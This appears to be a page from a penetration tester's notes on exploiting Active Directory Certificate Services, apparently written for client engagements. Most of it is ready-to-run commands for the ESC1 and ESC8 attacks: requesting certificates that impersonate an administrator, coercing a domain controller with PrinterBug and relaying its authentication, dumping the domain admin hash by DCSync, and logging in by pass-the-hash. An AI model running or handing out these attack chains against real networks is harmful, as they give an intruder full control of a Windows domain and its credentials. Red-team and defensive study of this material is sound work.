ADCS Exploitation

For ADCS attacks, use Certipy to check for ADCS vulnerabilities in templates and ADCS server configuration.

Install

pipx install git+https://github.com/ly4k/Certipy

Locate Vulnerable Templates

certipy find -u $ADUSER@$ADDOMAIN -dc-ip $ADCONTROLLER -stdout -vulnerable

Privilege Escalation Vulnerabilities

ESC1

NTLM

# Request Cert
certipy req -u $ADUSER@$ADDOMAIN -ca <CA> -template <TEMPLATE NAME> -upn <[email protected]m>

# Use Cert for DCSync attack on SAN (upn)
sudo certipy auth -pfx <administrator.pfx> -dc-ip $ADCONTROLLER

Kerberos

# Get Kerberos TGT
impacket-getTGT $ADDOMAIN/$ADUSER -dc-ip <DC>
export KRB5CCNAME=$ADUSER.ccache

# Request Cert
certipy req -k -no-pass -target ADCS-01.EXAMPLE.COM -ca ADCS-01 -template 'Temp-User' -upn <[email protected]m>

# Use Cert for DCSync attack on SAN (upn)
sudo certipy auth -pfx <administrator.pfx> -dc-ip $ADCONTROLLER

ESC8

# Start SMB Listener/Relay
sudo certipy relay -ca <CA IP> -template DomainController -target <CA HOSTNAME>

# Coerce DC (PrinterBug)
git clone https://github.com/dirkjanm/krbrelayx
cd krbrelayx
./printerbug.py <DOMAIN>/$ADUSER@$ADCONTROLLER <LISTENER_IP>

# Use captured certifcate to get TGT
certipy auth -pfx <CERTIFCATE FILE> -dc-ip $ADCONTROLLER -no-hash
export KRB5CCNAME=$(realpath <DC01.ccache>)

# Dump Domain Admin Hash with DCSync
impacket-secretsdump -k -no-pass $ADDOMAIN/<TGT USERNAME>@$ADCONTROLLER -just-dc-user <administrator>

# PTH to login to DC
impacket-wmiexec $ADDOMAIN/<administrator>@$ADCONTROLLER -hashes '<NTLM HASH>'

If impacket-secretsdump fails, try to use a PTH attack instead (remove the -no-hash from the certipy auth command)

You may want to use impacket to relay the coerced creds instead of certipy. certipy doesn't give you the cert ID which clients like to have for cleanup. However, I haven't tried running certipy with the -v flag.

References

PreviousAnalyzing Data with BloodhoundNextSCCM Exploitation

Last updated